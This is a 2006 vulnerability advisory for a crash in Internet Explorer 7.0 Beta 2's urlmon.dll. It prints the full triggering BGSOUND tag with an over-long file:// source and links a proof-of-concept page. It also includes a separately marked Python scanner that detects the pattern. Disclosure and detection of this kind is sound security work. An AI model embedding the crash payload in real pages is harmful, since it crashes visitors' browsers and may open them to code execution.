Internet Explorer 7.0 Beta 2 urlmon.dll DoS

Release Date:
Jan 31, 2006

Severity:
Medium

Vendor:
Microsoft

Versions Affected:
Internet Explorer 7.0 Beta 2 (7.0.5296.0)

Overview:
A denial of service vulnerability exists in Microsoft Internet Explorer 7.0 Beta 2 that allows an attacker to crash the browser and/or execute arbitrary code on the targeted host.

Technical Details:
When a specially crafted .html file is loaded, urlmon.dll improperly parses the 'BGSOUND SRC=file://---' (approx. 344 dashes) and causes the crash.

The following HTML code will trigger the crash:

BGSOUND SRC=file://--------------------------------------------------------------------- -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- ---------------------------------- >

Or visit the following URL:

http://www.security-protocols.com/poc/sp-x23.html
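
A defensive check for the pattern described above, added here as an example and not part of the original advisory: it scans HTML for BGSOUND tags whose SRC is an over-long file:// URL, as a content filter or mail gateway might. The names MAX_FILE_URL_LEN, BgsoundScanner and scan_html, the 256-character cut-off and the sample strings are assumptions made for illustration.

```python
from html.parser import HTMLParser

# Assumption: illustrative cut-off, set below the ~344 characters the
# advisory reports; tune it against your own traffic.
MAX_FILE_URL_LEN = 256


class BgsoundScanner(HTMLParser):
    """Collect BGSOUND tags whose SRC is an over-long file:// URL."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag != "bgsound":
            return
        for name, value in attrs:
            url = (value or "").strip()
            if name != "src" or not url.lower().startswith("file://"):
                continue
            rest = url[len("file://"):]
            if len(rest) <= MAX_FILE_URL_LEN:
                continue
            # Share of the most frequent character: padding runs score
            # near 1.0, ordinary paths score lower.
            top = max(rest.count(c) for c in set(rest))
            line, _col = self.getpos()
            self.findings.append({"line": line, "length": len(rest),
                                  "dominant_ratio": round(top / len(rest), 2)})


def scan_html(text):
    """Return one finding per suspicious BGSOUND tag in an HTML string."""
    scanner = BgsoundScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


# Constructed samples (not captured traffic).
SAMPLE_BAD = "<html><body>\n<BGSOUND SRC=file://" + "-" * 344 + " >\n</body></html>"
SAMPLE_OK = '<html><body>\n<bgsound src="file:///C:/sounds/chime.wav">\n</body></html>'

if __name__ == "__main__":
    print(scan_html(SAMPLE_BAD))
    print(scan_html(SAMPLE_OK))
```

Each finding records the line of the tag, the length of the URL after file:// and how much of it is a single repeated character, which is enough to triage a hit without re-opening the page in a browser.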

Vendor Status:
Microsoft was notified.

Workaround:
Mozilla Firefox

Discovered by:
Tom Ferris

tommy[at]security-protocols[dot]com

Related Links:
http://microsoft.com/windows/IE/ie7/ie7betaredirect.mspx
http://getfirefox.com

Security-Protocols.com :: 1999-2008